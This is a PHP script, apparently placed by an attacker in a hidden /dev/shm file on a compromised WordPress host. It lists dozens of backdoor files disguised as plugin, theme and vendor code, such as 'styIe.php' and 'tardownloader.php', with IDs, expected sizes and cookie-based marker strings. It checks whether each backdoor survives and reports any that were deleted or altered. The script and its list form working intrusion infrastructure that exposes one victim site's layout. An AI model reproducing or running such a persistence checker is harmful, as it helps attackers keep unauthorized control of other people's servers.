File: //dev/shm/.reference
<?php $r = '/home/writingk/public_html'; $x = ["/wp-includes/rest-api/endpoints/class-wp-rest-taxonomies-controller.php"=>"bd@@11672@@45",
"/wp-content/themes/sinatra/woocommerce/cart/header-widget/empty.php"=>"bd@@33678@@right_pad_string",
"/wp-content/plugins/updraftplus/backup.php"=>"bd@@33679@@$_COOKIE[9",
"/wp-content/plugins/fluent-smtp/includes/libs/google-api-client/build/vendor/phpseclib/phpseclib/phpseclib/Crypt/RSA/Formats/Keys/cashads.php"=>"bd@@33682@@1701",
"/wp-content/plugins/wp-rocket/inc/Dependencies/Monolog/Processor/tardownloader.php"=>"bd@@33702@@1025",
"/wp-content/wpbot-dfv2-client/google/auth/src/HttpHandler/Lexer.php"=>"bd@@33704@@534",
"/wp-content/plugins/burst-statistics/upgrade/upgrade.php"=>"bd@@33709@@2343",
"/wp-content/plugins/svg-support/admin/plugin.init.page.links.php"=>"bd@@33710@@1715",
"/wp-content/plugins/autodescription/inc/views/settings/metaboxes/index.php"=>"bd@@27533@@1",
"/wp-content/plugins/really-simple-ssl/lets-encrypt/vendor/plesk/api-php-lib/src/Api/Struct/SiteAlias/cust_add.php"=>"bd@@14991@@1664",
"/wp-content/plugins/updraftplus/vendor/rackspace/php-opencloud/lib/OpenCloud/ObjectStore/Exception/change_pass.php"=>"bd@@14994@@1062",
"/wp-content/plugins/wp-file-manager/lib/php/plugins/Sanitizer/plugin.php"=>"bd@@27549@@42",
"/wp-content/updraft/plugins-old/metform/widgets/date/options.php"=>"bd@@26785@@1044",
"/wp-content/plugins/really-simple-ssl/lets-encrypt/vendor/plesk/api-php-lib/src/Api/Struct/Locale/strrev.php"=>"bd@@12080@@643",
"/wp-content/wpbot-dfv2-client/google/apiclient-services/src/Google/Service/CloudFilestore/Resource/UnderCurriculum.php"=>"bd@@12092@@1031",
"/wp-content/wpbot-dfv2-client/google/apiclient-services/src/Google/Service/ServiceRegistry/Resource/trade.notify.php"=>"bd@@12111@@2739",
"/wp-content/wpbot-dfv2-client/google/apiclient-services/src/Google/Service/Doubleclicksearch/Resource/SavedColumns.php"=>"bd@@11875@@$_COOKIE[4",
"/wp-content/wpbot-dfv2-client/google/apiclient-services/src/Google/Service/Firestore/FirestoreEmpty.php"=>"bd@@14983@@_COOKIE[3]",
"/wp-content/wpbot-dfv2-client/google/apiclient-services/src/Google/Service/Dfareporting/ConversionStatus.php"=>"bd@@14985@@78",
"/wp-admin/includes/admin-filters.php"=>"bd@@14986@@44",
"/wp-content/wpbot-dfv2-client/google/apiclient-services/src/Google/Service/Analytics/Resource/Data.php"=>"bd@@14987@@15",
"/wp-content/themes/custom-file-1-1748306376/styIe.php"=>"bd@@11404@@1105",
"/wp-content/wpbot-dfv2-client/google/apiclient-services/src/Google/Service/Vault/RemoveHeldAccountsRequest.php"=>"bd@@14988@@60",
"/wp-content/plugins/fluent-smtp/includes/libs/google-api-client/build/vendor/symfony/deprecation-contracts/class.filter.php"=>"bd@@14992@@617",
"/wp-content/plugins/fast-indexing-api/vendor/monolog/monolog/src/Monolog/Handler/FingersCrossed/product_listing1.php"=>"bd@@14996@@1665",
"/wp-content/wpbot-dfv2-client/google/apiclient-services/src/Google/Service/AndroidEnterprise/core.rm_auto.php"=>"bd@@12186@@1649",
"/wp-content/wpbot-dfv2-client/google/apiclient-services/src/Google/Service/CloudIdentity/Resource/formtextarea.php"=>"bd@@15002@@1707",
"/wp-content/wpbot-dfv2-client/google/apiclient-services/src/Google/Service/RemoteBuildExecution/BuildBazelRemoteExecutionV2FileNode.php"=>"bd@@27555@@32",
"/wp-content/wpbot-dfv2-client/google/apiclient-services/src/Google/Service/PolyService/actions.php"=>"bd@@27556@@1686",
"/wp-content/plugins/wp-optimize/vendor/phpseclib/phpseclib/phpseclib/Crypt/2lines.php"=>"bd@@27557@@535",
"/wp-content/updraft/plugins-old/elementskit-lite/modules/header-footer/theme-hooks/my.php"=>"bd@@27558@@1043",
"/wp-content/wpbot-dfv2-client/google/apiclient-services/src/Google/Service/Firestore/MapValue.php"=>"bd@@11945@@$_COOKIE[-",
"/wp-content/plugins/wp-optimize/vendor/mrclay/props-dic/src/Props/w.php"=>"bd@@12202@@1057",
"/wp-content/mu-plugins-old/top_1748952917.php"=>"bd@@18374@@1105",
"/wp-content/wpbot-dfv2-client/google/apiclient-services/src/Google/Service/ShoppingContent/ProductAmount.php"=>"bd@@11771@@_COOKIE[3]",
"/wp-content/wpbot-dfv2-client/google/apiclient-services/src/Google/Service/Autoscaler/Operation.php"=>"bd@@12029@@14",
"/wp-content/plugins/fluent-smtp/includes/libs/google-api-client/build/vendor/phpseclib/phpseclib/phpseclib/Math/BigInteger/Engines/BCMath/Reductions/renderfront.php"=>"ui@@332@@6886",
"/wp-includes/capabilities.php"=>"ui@@332@@renderfront.php"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');